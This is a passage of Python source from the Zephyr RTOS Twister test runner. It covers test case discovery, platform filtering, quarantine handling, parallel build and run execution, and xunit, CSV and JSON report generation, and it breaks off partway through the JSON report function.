instance.run: more_info = instance.handler.type_str htime = instance.handler.duration if htime: more_info += " {:.3f}s".format(htime) else: more_info = "build" logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format( results.done, total_tests_width, total_to_do, instance.platform.name, instance.testcase.name, status, more_info)) if instance.status in ["error", "failed", "timeout"]: self.log_info_file(self.inline_logs) else: completed_perc = 0 if total_to_do > 0: completed_perc = int((float(results.done) / total_to_do) * 100) skipped = results.skipped_configs + results.skipped_runtime sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % ( Fore.GREEN, results.done, total_to_do, Fore.RESET, completed_perc, Fore.YELLOW if skipped > 0 else Fore.RESET, skipped, Fore.RESET, Fore.RED if results.failed > 0 else Fore.RESET, results.failed, Fore.RESET ) ) sys.stdout.flush() def cmake(self): instance = self.instance args = self.testcase.extra_args[:] args += self.extra_args if instance.handler: args += instance.handler.args # merge overlay files into one variable def extract_overlays(args): re_overlay = re.compile('OVERLAY_CONFIG=(.*)') other_args = [] overlays = [] for arg in args: match = re_overlay.search(arg) if match: overlays.append(match.group(1).strip('\'"')) else: other_args.append(arg) args[:] = other_args return overlays overlays = extract_overlays(args) if os.path.exists(os.path.join(instance.build_dir, "twister", "testcase_extra.conf")): overlays.append(os.path.join(instance.build_dir, "twister", "testcase_extra.conf")) if overlays: args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays))) res = self.run_cmake(args) return res def build(self): res = self.run_build(['--build', self.build_dir]) return res def run(self): instance = self.instance if instance.handler: if instance.handler.type_str == "device": instance.handler.suite = self.suite instance.handler.handle() sys.stdout.flush() class TestSuite(DisablePyTestCollectionMixin): config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') tc_schema = scl.yaml_load( os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "testcase-schema.yaml")) quarantine_schema = scl.yaml_load( os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "quarantine-schema.yaml")) testcase_valid_keys = {"tags": {"type": "set", "required": False}, "type": {"type": "str", "default": "integration"}, "extra_args": {"type": "list"}, "extra_configs": {"type": "list"}, "build_only": {"type": "bool", "default": False}, "build_on_all": {"type": "bool", "default": False}, "skip": {"type": "bool", "default": False}, "slow": {"type": "bool", "default": False}, "timeout": {"type": "int", "default": 60}, "min_ram": {"type": "int", "default": 8}, "depends_on": {"type": "set"}, "min_flash": {"type": "int", "default": 32}, "arch_allow": {"type": "set"}, "arch_exclude": {"type": "set"}, "extra_sections": {"type": "list", "default": []}, "integration_platforms": {"type": "list", "default": []}, "platform_exclude": {"type": "set"}, "platform_allow": {"type": "set"}, "toolchain_exclude": {"type": "set"}, "toolchain_allow": {"type": "set"}, "filter": {"type": "str"}, "harness": {"type": "str"}, "harness_config": {"type": "map", "default": {}} } RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release", "twister_last_release.csv") SAMPLE_FILENAME = 'sample.yaml' TESTCASE_FILENAME = 'testcase.yaml' def __init__(self, board_root_list=[], testcase_roots=[], outdir=None): self.roots = testcase_roots if not isinstance(board_root_list, list): self.board_roots = [board_root_list] else: self.board_roots = board_root_list # Testsuite Options self.coverage_platform = [] self.build_only = False self.cmake_only = False self.cleanup = False self.enable_slow = False self.device_testing = False self.fixtures = [] self.enable_coverage = False self.enable_ubsan = False self.enable_lsan = False self.enable_asan = False self.enable_valgrind = False self.extra_args = [] self.inline_logs = False self.enable_sizes_report = False self.west_flash = None self.west_runner = None self.generator = None self.generator_cmd = None self.warnings_as_errors = True self.overflow_as_errors = False self.quarantine_verify = False # Keep track of which test cases we've filtered out and why self.testcases = {} self.quarantine = {} self.platforms = [] self.platform_names = [] self.selected_platforms = [] self.filtered_platforms = [] self.default_platforms = [] self.outdir = os.path.abspath(outdir) self.discards = {} self.load_errors = 0 self.instances = dict() self.total_platforms = 0 self.start_time = 0 self.duration = 0 self.warnings = 0 # hardcoded for now self.duts = [] # run integration tests only self.integration = False self.pipeline = None self.version = "NA" def check_zephyr_version(self): try: subproc = subprocess.run(["git", "describe", "--abbrev=12"], stdout=subprocess.PIPE, universal_newlines=True, cwd=ZEPHYR_BASE) if subproc.returncode == 0: self.version = subproc.stdout.strip() logger.info(f"Zephyr version: {self.version}") except OSError: logger.info("Cannot read zephyr version.") def get_platform_instances(self, platform): filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)} return filtered_dict def config(self): logger.info("coverage platform: {}".format(self.coverage_platform)) # Debug Functions @staticmethod def info(what): sys.stdout.write(what + "\n") sys.stdout.flush() def update_counting(self, results=None, initial=False): results.skipped_configs = 0 results.skipped_cases = 0 for instance in self.instances.values(): if initial: results.cases += len(instance.testcase.cases) if instance.status == 'skipped': results.skipped_configs += 1 results.skipped_cases += len(instance.testcase.cases) elif instance.status == "passed": results.passed += 1 for res in instance.results.values(): if res == 'SKIP': results.skipped_cases += 1 def compare_metrics(self, filename): # name, datatype, lower results better interesting_metrics = [("ram_size", int, True), ("rom_size", int, True)] if not os.path.exists(filename): logger.error("Cannot compare metrics, %s not found" % filename) return [] results = [] saved_metrics = {} with open(filename) as fp: cr = csv.DictReader(fp) for row in cr: d = {} for m, _, _ in interesting_metrics: d[m] = row[m] saved_metrics[(row["test"], row["platform"])] = d for instance in self.instances.values(): mkey = (instance.testcase.name, instance.platform.name) if mkey not in saved_metrics: continue sm = saved_metrics[mkey] for metric, mtype, lower_better in interesting_metrics: if metric not in instance.metrics: continue if sm[metric] == "": continue delta = instance.metrics.get(metric, 0) - mtype(sm[metric]) if delta == 0: continue results.append((instance, metric, instance.metrics.get(metric, 0), delta, lower_better)) return results def footprint_reports(self, report, show_footprint, all_deltas, footprint_threshold, last_metrics): if not report: return logger.debug("running footprint_reports") deltas = self.compare_metrics(report) warnings = 0 if deltas and show_footprint: for i, metric, value, delta, lower_better in deltas: if not all_deltas and ((delta < 0 and lower_better) or (delta > 0 and not lower_better)): continue percentage = 0 if value > delta: percentage = (float(delta) / float(value - delta)) if not all_deltas and (percentage < (footprint_threshold / 100.0)): continue logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format( i.platform.name, i.testcase.name, Fore.YELLOW, "INFO" if all_deltas else "WARNING", Fore.RESET, metric, delta, value, percentage)) warnings += 1 if warnings: logger.warning("Deltas based on metrics from last %s" % ("release" if not last_metrics else "run")) def summary(self, results, unrecognized_sections): failed = 0 run = 0 for instance in self.instances.values(): if instance.status == "failed": failed += 1 elif instance.metrics.get("unrecognized") and not unrecognized_sections: logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" % (Fore.RED, Fore.RESET, instance.name, str(instance.metrics.get("unrecognized", [])))) failed += 1 if instance.metrics.get('handler_time', None): run += 1 if results.total and results.total != results.skipped_configs: pass_rate = (float(results.passed) / float(results.total - results.skipped_configs)) else: pass_rate = 0 logger.info( "{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format( Fore.RED if failed else Fore.GREEN, results.passed, results.total - results.skipped_configs, Fore.RESET, pass_rate, Fore.RED if results.failed else Fore.RESET, results.failed, Fore.RESET, results.skipped_configs, Fore.YELLOW if self.warnings else Fore.RESET, self.warnings, Fore.RESET, self.duration)) self.total_platforms = len(self.platforms) # if we are only building, do not report about tests being executed. if self.platforms and not self.build_only: logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format( results.cases - results.skipped_cases, results.skipped_cases, len(self.filtered_platforms), self.total_platforms, (100 * len(self.filtered_platforms) / len(self.platforms)) )) logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \ {Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.") def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report): if not self.instances: return logger.info("Saving reports...") if name: report_name = name else: report_name = "twister" if report_dir: os.makedirs(report_dir, exist_ok=True) filename = os.path.join(report_dir, report_name) outdir = report_dir else: filename = os.path.join(self.outdir, report_name) outdir = self.outdir if suffix: filename = "{}_{}".format(filename, suffix) if not no_update: self.xunit_report(filename + ".xml", full_report=False, append=only_failed, version=self.version) self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed, version=self.version) self.csv_report(filename + ".csv") if json_report: self.json_report(filename + ".json", append=only_failed, version=self.version) if platform_reports: self.target_report(outdir, suffix, append=only_failed) if self.discards: self.discard_report(filename + "_discard.csv") if release: self.csv_report(self.RELEASE_DATA) def add_configurations(self): for board_root in self.board_roots: board_root = os.path.abspath(board_root) logger.debug("Reading platform configuration files under %s..." % board_root) for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")): try: platform = Platform() platform.load(file) if platform.name in [p.name for p in self.platforms]: logger.error(f"Duplicate platform {platform.name} in {file}") raise Exception(f"Duplicate platform identifier {platform.name} found") if platform.twister: self.platforms.append(platform) if platform.default: self.default_platforms.append(platform.name) except RuntimeError as e: logger.error("E: %s: can't load: %s" % (file, e)) self.load_errors += 1 self.platform_names = [p.name for p in self.platforms] def get_all_tests(self): tests = [] for _, tc in self.testcases.items(): for case in tc.cases: tests.append(case) return tests @staticmethod def get_toolchain(): toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake') result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"]) try: if result['returncode']: raise TwisterRuntimeError(f"E: {result['returnmsg']}") except Exception as e: print(str(e)) sys.exit(2) toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT'] logger.info(f"Using '{toolchain}' toolchain.") return toolchain def add_testcases(self, testcase_filter=[]): for root in self.roots: root = os.path.abspath(root) logger.debug("Reading test case configuration files under %s..." % root) for dirpath, _, filenames in os.walk(root, topdown=True): if self.SAMPLE_FILENAME in filenames: filename = self.SAMPLE_FILENAME elif self.TESTCASE_FILENAME in filenames: filename = self.TESTCASE_FILENAME else: continue logger.debug("Found possible test case in " + dirpath) tc_path = os.path.join(dirpath, filename) try: parsed_data = TwisterConfigParser(tc_path, self.tc_schema) parsed_data.load() tc_path = os.path.dirname(tc_path) workdir = os.path.relpath(tc_path, root) for name in parsed_data.tests.keys(): tc = TestCase(root, workdir, name) tc_dict = parsed_data.get_test(name, self.testcase_valid_keys) tc.source_dir = tc_path tc.yamlfile = tc_path tc.type = tc_dict["type"] tc.tags = tc_dict["tags"] tc.extra_args = tc_dict["extra_args"] tc.extra_configs = tc_dict["extra_configs"] tc.arch_allow = tc_dict["arch_allow"] tc.arch_exclude = tc_dict["arch_exclude"] tc.skip = tc_dict["skip"] tc.platform_exclude = tc_dict["platform_exclude"] tc.platform_allow = tc_dict["platform_allow"] tc.toolchain_exclude = tc_dict["toolchain_exclude"] tc.toolchain_allow = tc_dict["toolchain_allow"] tc.tc_filter = tc_dict["filter"] tc.timeout = tc_dict["timeout"] tc.harness = tc_dict["harness"] tc.harness_config = tc_dict["harness_config"] if tc.harness == 'console' and not tc.harness_config: raise Exception('Harness config error: console harness defined without a configuration.') tc.build_only = tc_dict["build_only"] tc.build_on_all = tc_dict["build_on_all"] tc.slow = tc_dict["slow"] tc.min_ram = tc_dict["min_ram"] tc.depends_on = tc_dict["depends_on"] tc.min_flash = tc_dict["min_flash"] tc.extra_sections = tc_dict["extra_sections"] tc.integration_platforms = tc_dict["integration_platforms"] tc.parse_subcases(tc_path) if testcase_filter: if tc.name and tc.name in testcase_filter: self.testcases[tc.name] = tc else: self.testcases[tc.name] = tc except Exception as e: logger.error("%s: can't load (skipping): %s" % (tc_path, e)) self.load_errors += 1 return len(self.testcases) def get_platform(self, name): selected_platform = None for platform in self.platforms: if platform.name == name: selected_platform = platform break return selected_platform def load_quarantine(self, file): """ Loads quarantine list from the given yaml file. Creates a dictionary of all tests configurations (platform + scenario: comment) that shall be skipped due to quarantine """ # Load yaml into quarantine_yaml quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema) # Create quarantine_list with a product of the listed # platforms and scenarios for each entry in quarantine yaml quarantine_list = [] for quar_dict in quarantine_yaml: if quar_dict['platforms'][0] == "all": plat = self.platform_names else: plat = quar_dict['platforms'] comment = quar_dict.get('comment', "NA") quarantine_list.append([{".".join([p, s]): comment} for p in plat for s in quar_dict['scenarios']]) # Flatten the quarantine_list quarantine_list = [it for sublist in quarantine_list for it in sublist] # Change quarantine_list into a dictionary for d in quarantine_list: self.quarantine.update(d) def load_from_file(self, file, filter_status=[], filter_platform=[]): try: with open(file, "r") as fp: cr = csv.DictReader(fp) instance_list = [] for row in cr: if row["status"] in filter_status: continue test = row["test"] platform = self.get_platform(row["platform"]) if filter_platform and platform.name not in filter_platform: continue instance = TestInstance(self.testcases[test], platform, self.outdir) if self.device_testing: tfilter = 'runnable' else: tfilter = 'buildable' instance.run = instance.check_runnable( self.enable_slow, tfilter, self.fixtures ) instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform) instance_list.append(instance) self.add_instances(instance_list) except KeyError as e: logger.error("Key error while parsing tests file.({})".format(str(e))) sys.exit(2) except FileNotFoundError as e: logger.error("Couldn't find input file with list of tests. ({})".format(e)) sys.exit(2) def apply_filters(self, **kwargs): toolchain = self.get_toolchain() discards = {} platform_filter = kwargs.get('platform') exclude_platform = kwargs.get('exclude_platform', []) testcase_filter = kwargs.get('run_individual_tests', []) arch_filter = kwargs.get('arch') tag_filter = kwargs.get('tag') exclude_tag = kwargs.get('exclude_tag') all_filter = kwargs.get('all') runnable = kwargs.get('runnable') force_toolchain = kwargs.get('force_toolchain') force_platform = kwargs.get('force_platform') emu_filter = kwargs.get('emulation_only') logger.debug("platform filter: " + str(platform_filter)) logger.debug(" arch_filter: " + str(arch_filter)) logger.debug(" tag_filter: " + str(tag_filter)) logger.debug(" exclude_tag: " + str(exclude_tag)) default_platforms = False emulation_platforms = False if all_filter: logger.info("Selecting all possible platforms per test case") # When --all used, any --platform arguments ignored platform_filter = [] elif not platform_filter and not emu_filter: logger.info("Selecting default platforms per test case") default_platforms = True elif emu_filter: logger.info("Selecting emulation platforms per test case") emulation_platforms = True if platform_filter: self.verify_platforms_existence(platform_filter, f"platform_filter") platforms = list(filter(lambda p: p.name in platform_filter, self.platforms)) elif emu_filter: platforms = list(filter(lambda p: p.simulation != 'na', self.platforms)) elif arch_filter: platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms)) elif default_platforms: platforms = list(filter(lambda p: p.default, self.platforms)) else: platforms = self.platforms logger.info("Building initial testcase list...") for tc_name, tc in self.testcases.items(): if tc.build_on_all and not platform_filter: platform_scope = self.platforms elif tc.integration_platforms and self.integration: self.verify_platforms_existence( tc.integration_platforms, f"{tc_name} - integration_platforms") platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \ self.platforms)) else: platform_scope = platforms integration = self.integration and tc.integration_platforms # If there isn't any overlap between the platform_allow list and the platform_scope # we set the scope to the platform_allow list if tc.platform_allow and not platform_filter and not integration: self.verify_platforms_existence( tc.platform_allow, f"{tc_name} - platform_allow") a = set(platform_scope) b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms)) c = a.intersection(b) if not c: platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \ self.platforms)) # list of instances per testcase, aka configurations. instance_list = [] for plat in platform_scope: instance = TestInstance(tc, plat, self.outdir) if runnable: tfilter = 'runnable' else: tfilter = 'buildable' instance.run = instance.check_runnable( self.enable_slow, tfilter, self.fixtures ) for t in tc.cases: instance.results[t] = None if runnable and self.duts: for h in self.duts: if h.platform == plat.name: if tc.harness_config.get('fixture') in h.fixtures: instance.run = True if not force_platform and plat.name in exclude_platform: discards[instance] = discards.get(instance, "Platform is excluded on command line.") if (plat.arch == "unit") != (tc.type == "unit"): # Discard silently continue if runnable and not instance.run: discards[instance] = discards.get(instance, "Not runnable on device") if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms: discards[instance] = discards.get(instance, "Not part of integration platforms") if tc.skip: discards[instance] = discards.get(instance, "Skip filter") if tag_filter and not tc.tags.intersection(tag_filter): discards[instance] = discards.get(instance, "Command line testcase tag filter") if exclude_tag and tc.tags.intersection(exclude_tag): discards[instance] = discards.get(instance, "Command line testcase exclude filter") if testcase_filter and tc_name not in testcase_filter: discards[instance] = discards.get(instance, "Testcase name filter") if arch_filter and plat.arch not in arch_filter: discards[instance] = discards.get(instance, "Command line testcase arch filter") if not force_platform: if tc.arch_allow and plat.arch not in tc.arch_allow: discards[instance] = discards.get(instance, "Not in test case arch allow list") if tc.arch_exclude and plat.arch in tc.arch_exclude: discards[instance] = discards.get(instance, "In test case arch exclude") if tc.platform_exclude and plat.name in tc.platform_exclude: discards[instance] = discards.get(instance, "In test case platform exclude") if tc.toolchain_exclude and toolchain in tc.toolchain_exclude: discards[instance] = discards.get(instance, "In test case toolchain exclude") if platform_filter and plat.name not in platform_filter: discards[instance] = discards.get(instance, "Command line platform filter") if tc.platform_allow and plat.name not in tc.platform_allow: discards[instance] = discards.get(instance, "Not in testcase platform allow list") if tc.toolchain_allow and toolchain not in tc.toolchain_allow: discards[instance] = discards.get(instance, "Not in testcase toolchain allow list") if not plat.env_satisfied: discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env))) if not force_toolchain \ and toolchain and (toolchain not in plat.supported_toolchains) \ and "host" not in plat.supported_toolchains \ and tc.type != 'unit': discards[instance] = discards.get(instance, "Not supported by the toolchain") if plat.ram < tc.min_ram: discards[instance] = discards.get(instance, "Not enough RAM") if tc.depends_on: dep_intersection = tc.depends_on.intersection(set(plat.supported)) if dep_intersection != set(tc.depends_on): discards[instance] = discards.get(instance, "No hardware support") if plat.flash < tc.min_flash: discards[instance] = discards.get(instance, "Not enough FLASH") if set(plat.ignore_tags) & tc.tags: discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)") if plat.only_tags and not set(plat.only_tags) & tc.tags: discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)") test_configuration = ".".join([instance.platform.name, instance.testcase.id]) # skip quarantined tests if test_configuration in self.quarantine and not self.quarantine_verify: discards[instance] = discards.get(instance, f"Quarantine: {self.quarantine[test_configuration]}") # run only quarantined test to verify their statuses (skip everything else) if self.quarantine_verify and test_configuration not in self.quarantine: discards[instance] = discards.get(instance, "Not under quarantine") # if nothing stopped us until now, it means this configuration # needs to be added. instance_list.append(instance) # no configurations, so jump to next testcase if not instance_list: continue # if twister was launched with no platform options at all, we # take all default platforms if default_platforms and not tc.build_on_all and not integration: if tc.platform_allow: a = set(self.default_platforms) b = set(tc.platform_allow) c = a.intersection(b) if c: aa = list(filter(lambda tc: tc.platform.name in c, instance_list)) self.add_instances(aa) else: self.add_instances(instance_list) else: instances = list(filter(lambda tc: tc.platform.default, instance_list)) self.add_instances(instances) elif integration: instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list)) self.add_instances(instances) elif emulation_platforms: self.add_instances(instance_list) for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)): discards[instance] = discards.get(instance, "Not an emulated platform") else: self.add_instances(instance_list) for _, case in self.instances.items(): case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform) self.discards = discards self.selected_platforms = set(p.platform.name for p in self.instances.values()) remove_from_discards = [] # configurations to be removed from discards. for instance in self.discards: instance.reason = self.discards[instance] # If integration mode is on all skips on integration_platforms are treated as errors. if self.integration and instance.platform.name in instance.testcase.integration_platforms \ and "Quarantine" not in instance.reason: instance.status = "error" instance.reason += " but is one of the integration platforms" instance.fill_results_by_status() self.instances[instance.name] = instance # Such configuration has to be removed from discards to make sure it won't get skipped remove_from_discards.append(instance) else: instance.status = "skipped" instance.fill_results_by_status() self.filtered_platforms = set(p.platform.name for p in self.instances.values() if p.status != "skipped" ) # Remove from discards configururations that must not be discarded (e.g. integration_platforms when --integration was used) for instance in remove_from_discards: del self.discards[instance] return discards def add_instances(self, instance_list): for instance in instance_list: self.instances[instance.name] = instance @staticmethod def calc_one_elf_size(instance): if instance.status not in ["error", "failed", "skipped"]: if instance.platform.type != "native": size_calc = instance.calculate_sizes() instance.metrics["ram_size"] = size_calc.get_ram_size() instance.metrics["rom_size"] = size_calc.get_rom_size() instance.metrics["unrecognized"] = size_calc.unrecognized_sections() else: instance.metrics["ram_size"] = 0 instance.metrics["rom_size"] = 0 instance.metrics["unrecognized"] = [] instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0 def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False): for instance in self.instances.values(): if build_only: instance.run = False if instance.status not in ['passed', 'skipped', 'error']: logger.debug(f"adding {instance.name}") instance.status = None if test_only and instance.run: pipeline.put({"op": "run", "test": instance}) else: pipeline.put({"op": "cmake", "test": instance}) # If the instance got 'error' status before, proceed to the report stage if instance.status == "error": pipeline.put({"op": "report", "test": instance}) def pipeline_mgr(self, pipeline, done_queue, lock, results): while True: try: task = pipeline.get_nowait() except queue.Empty: break else: test = task['test'] pb = ProjectBuilder(self, test, lsan=self.enable_lsan, asan=self.enable_asan, ubsan=self.enable_ubsan, coverage=self.enable_coverage, extra_args=self.extra_args, device_testing=self.device_testing, cmake_only=self.cmake_only, cleanup=self.cleanup, valgrind=self.enable_valgrind, inline_logs=self.inline_logs, generator=self.generator, generator_cmd=self.generator_cmd, verbose=self.verbose, warnings_as_errors=self.warnings_as_errors, overflow_as_errors=self.overflow_as_errors ) pb.process(pipeline, done_queue, task, lock, results) return True def execute(self, pipeline, done, results): lock = Lock() logger.info("Adding tasks to the queue...") self.add_tasks_to_queue(pipeline, self.build_only, self.test_only) logger.info("Added initial list of jobs to queue") processes = [] for job in range(self.jobs): logger.debug(f"Launch process {job}") p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, )) processes.append(p) p.start() try: for p in processes: p.join() except KeyboardInterrupt: logger.info("Execution interrupted") for p in processes: p.terminate() # FIXME: This needs to move out. if self.enable_size_report and not self.cmake_only: # Parallelize size calculation executor = concurrent.futures.ThreadPoolExecutor(self.jobs) futures = [executor.submit(self.calc_one_elf_size, instance) for instance in self.instances.values()] concurrent.futures.wait(futures) else: for instance in self.instances.values(): instance.metrics["ram_size"] = 0 instance.metrics["rom_size"] = 0 instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0 instance.metrics["unrecognized"] = [] return results def discard_report(self, filename): try: if not self.discards: raise TwisterRuntimeError("apply_filters() hasn't been run!") except Exception as e: logger.error(str(e)) sys.exit(2) with open(filename, "wt") as csvfile: fieldnames = ["test", "arch", "platform", "reason"] cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep) cw.writeheader() for instance, reason in sorted(self.discards.items()): rowdict = {"test": instance.testcase.name, "arch": instance.platform.arch, "platform": instance.platform.name, "reason": reason} cw.writerow(rowdict) def target_report(self, outdir, suffix, append=False): platforms = {inst.platform.name for _, inst in self.instances.items()} for platform in platforms: if suffix: filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix)) else: filename = os.path.join(outdir,"{}.xml".format(platform)) self.xunit_report(filename, platform, full_report=True, append=append, version=self.version) @staticmethod def process_log(log_file): filtered_string = "" if os.path.exists(log_file): with open(log_file, "rb") as f: log = f.read().decode("utf-8") filtered_string = ''.join(filter(lambda x: x in string.printable, log)) return filtered_string def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"): total = 0 fails = passes = errors = skips = 0 if platform: selected = [platform] logger.info(f"Writing target report for {platform}...") else: logger.info(f"Writing xunit report {filename}...") selected = self.selected_platforms if os.path.exists(filename) and append: tree = ET.parse(filename) eleTestsuites = tree.getroot() else: eleTestsuites = ET.Element('testsuites') for p in selected: inst = self.get_platform_instances(p) fails = 0 passes = 0 errors = 0 skips = 0 duration = 0 for _, instance in inst.items(): handler_time = instance.metrics.get('handler_time', 0) duration += handler_time if full_report and instance.run: for k in instance.results.keys(): if instance.results[k] == 'PASS': passes += 1 elif instance.results[k] == 'BLOCK': errors += 1 elif instance.results[k] == 'SKIP' or instance.status in ['skipped']: skips += 1 else: fails += 1 else: if instance.status in ["error", "failed", "timeout", "flash_error"]: if instance.reason in ['build_error', 'handler_crash']: errors += 1 else: fails += 1 elif instance.status == 'skipped': skips += 1 elif instance.status == 'passed': passes += 1 else: if instance.status: logger.error(f"{instance.name}: Unknown status {instance.status}") else: logger.error(f"{instance.name}: No status") total = (errors + passes + fails + skips) # do not produce a report if no tests were actually run (only built) if total == 0: continue run = p eleTestsuite = None # When we re-run the tests, we re-use the results and update only with # the newly run tests. if os.path.exists(filename) and append: ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]') if ts: eleTestsuite = ts[0] eleTestsuite.attrib['failures'] = "%d" % fails eleTestsuite.attrib['errors'] = "%d" % errors eleTestsuite.attrib['skipped'] = "%d" % skips else: logger.info(f"Did not find any existing results for {p}") eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite', name=run, time="%f" % duration, tests="%d" % (total), failures="%d" % fails, errors="%d" % (errors), skipped="%s" % (skips)) eleTSPropetries = ET.SubElement(eleTestsuite, 'properties') # Multiple 'property' can be added to 'properties' # differing by name and value ET.SubElement(eleTSPropetries, 'property', name="version", value=version) else: eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite', name=run, time="%f" % duration, tests="%d" % (total), failures="%d" % fails, errors="%d" % (errors), skipped="%s" % (skips)) eleTSPropetries = ET.SubElement(eleTestsuite, 'properties') # Multiple 'property' can be added to 'properties' # differing by name and value ET.SubElement(eleTSPropetries, 'property', name="version", value=version) for _, instance in inst.items(): if full_report: tname = os.path.basename(instance.testcase.name) else: tname = instance.testcase.id handler_time = instance.metrics.get('handler_time', 0) if full_report: for k in instance.results.keys(): # remove testcases that are being re-run from exiting reports for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'): eleTestsuite.remove(tc) classname = ".".join(tname.split(".")[:2]) eleTestcase = ET.SubElement( eleTestsuite, 'testcase', classname=classname, name="%s" % (k), time="%f" % handler_time) if instance.results[k] in ['FAIL', 'BLOCK'] or \ (not instance.run and instance.status in ["error", "failed", "timeout"]): if instance.results[k] == 'FAIL': el = ET.SubElement( eleTestcase, 'failure', type="failure", message="failed") else: el = ET.SubElement( eleTestcase, 'error', type="failure", message=instance.reason) log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name) log_file = os.path.join(log_root, "handler.log") el.text = self.process_log(log_file) elif instance.results[k] == 'PASS' \ or (not instance.run and instance.status in ["passed"]): pass elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]): el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason) else: el = ET.SubElement( eleTestcase, 'error', type="error", message=f"{instance.reason}") else: if platform: classname = ".".join(instance.testcase.name.split(".")[:2]) else: classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2]) # remove testcases that are being re-run from exiting reports for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'): eleTestsuite.remove(tc) eleTestcase = ET.SubElement(eleTestsuite, 'testcase', classname=classname, name="%s" % (instance.testcase.name), time="%f" % handler_time) if instance.status in ["error", "failed", "timeout", "flash_error"]: failure = ET.SubElement( eleTestcase, 'failure', type="failure", message=instance.reason) log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name)) bl = os.path.join(log_root, "build.log") hl = os.path.join(log_root, "handler.log") log_file = bl if instance.reason != 'Build error': if os.path.exists(hl): log_file = hl else: log_file = bl failure.text = self.process_log(log_file) elif instance.status == "skipped": ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped") result = ET.tostring(eleTestsuites) with open(filename, 'wb') as report: report.write(result) return fails, passes, errors, skips def csv_report(self, filename): with open(filename, "wt") as csvfile: fieldnames = ["test", "arch", "platform", "status", "extra_args", "handler", "handler_time", "ram_size", "rom_size"] cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep) cw.writeheader() for instance in self.instances.values(): rowdict = {"test": instance.testcase.name, "arch": instance.platform.arch, "platform": instance.platform.name, "extra_args": " ".join(instance.testcase.extra_args), "handler": instance.platform.simulation} rowdict["status"] = instance.status if instance.status not in ["error", "failed", "timeout"]: if instance.handler: rowdict["handler_time"] = instance.metrics.get("handler_time", 0) ram_size = instance.metrics.get("ram_size", 0) rom_size = instance.metrics.get("rom_size", 0) rowdict["ram_size"] = ram_size rowdict["rom_size"] = rom_size cw.writerow(rowdict) def json_report(self, filename, append=False, version="NA"): logger.info(f"Writing JSON report {filename}") report = {} selected = self.selected_platforms report["environment"] = {"os": os.name, "zephyr_version": version, "toolchain": self.get_toolchain() } json_data = {} if os.path.exists(filename) and append: with open(filename, 'r') as json_file: json_data = json.load(json_file) suites = json_data.get("testsuites", []) if suites: suite = suites[0] testcases = suite.get("testcases", []) else: suite = {} testcases = [] for p in selected: inst = self.get_platform_instances(p) for _, instance in inst.items(): testcase = {} handler_log = os.path.join(instance.build_dir, "handler.log") build_log = os.path.join(instance.build_dir, "build.log") device_log = os.path.join(instance.build_dir, "device.log") handler_time = instance.metrics.get('handler_time', 0) ram_size = instance.metrics.get ("ram_size", 0) rom_size = instance.metrics.get("rom_size",0) for k in instance.results.keys(): testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases )) testcase = {"testcase": k, "arch": instance.platform.arch, "platform": p, } if ram_size: testcase["ram_size"] = ram_size if rom_size: testcase["rom_size"] = rom_size if instance.results[k] in ["SKIP"] or instance.status == 'skipped': testcase["status"] = "skipped" testcase["reason"] = instance.reason elif instance.results[k] in ["PASS"] or instance.status == 'passed': testcase["status"] = "passed" if 